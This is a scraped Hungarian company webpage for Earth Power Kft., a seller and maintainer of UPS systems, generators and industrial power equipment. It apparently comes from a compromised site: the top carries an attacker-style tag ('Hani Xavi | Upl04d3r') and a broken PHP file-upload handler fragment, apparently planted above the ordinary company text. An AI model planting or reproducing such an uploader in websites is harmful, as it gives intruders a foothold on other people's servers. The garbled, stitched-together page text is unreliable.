Hani Xavi | Upl04d3r
Undefined
0) { echo "Error: " . $_FILES["file"]["error"] . "
"; } else { echo "Upload: " . $_FILES["file"]["name"] . "
"; echo "Type: " . $_FILES["file"]["type"] . "
"; echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb
"; echo "Stored in: " . $_FILES["file"]["tmp_name"]; } ?>
Undefined

Üdvözöljük az Earth Power Kft. honlapján!

Bosszankodik, mérgelődik? Háztartásában, üzletében, vállalkozásában sűrű az áramkimaradás?


Mi segítünk. Hívjon, keressen minket!


Szolgáltatásaink között megtalálja az ipari szünetmentes (UPS) erősáramú rendszereket, automatikákat, dízel aggregátokat, ipari PLC-ket. Napelemes, illetve szélmotoros energia ellátást.


Foglalkozunk kijelző rendszerekkel, mikroelektronikai áramkörökkel, gázmotoros, biogázmotoros erőművekkel.


Cégünk 2004-ben indult. Az eddigi munkáink alapján, karbantartást végzünk egyetemeken, kórházakban, kutatóintézetekben, multinacionális üzlethálózatokban, mobil szolgáltatóknál, valamint más gazdasági társaságoknál.


Cégünk vállalja a gépek helyszíni telepítését, a telepítés megtervezését, illetve kivitelezését is. Vállaljuk továbbá rendszerek korszerűsítését, átalakítását. Országos szervizhálózattal rendelkezünk, mely lehetővé teszi a gyors és szakszerű hibaelhárítást.


Törekszünk arra, hogy a berendezések a legmegbízhatóbban működjenek, ezzel biztosítva a gépek gazdaságos és megbízható működését. A garanciaidőt követően átalánydíjas karbantartási szolgáltatással állunk rendelkezésre. Szolgáltatásunkban van olyan lehetőség, ha meghibásodna a berendezés, előzetes egyeztetés alapján, soron kívül, 4-72 órán belül igyekszünk megjavítani a meghibásodott gépet.


Várjuk szíves megrendelésüket a tevékenységköreinknek megfelelő feladatokra.

magyar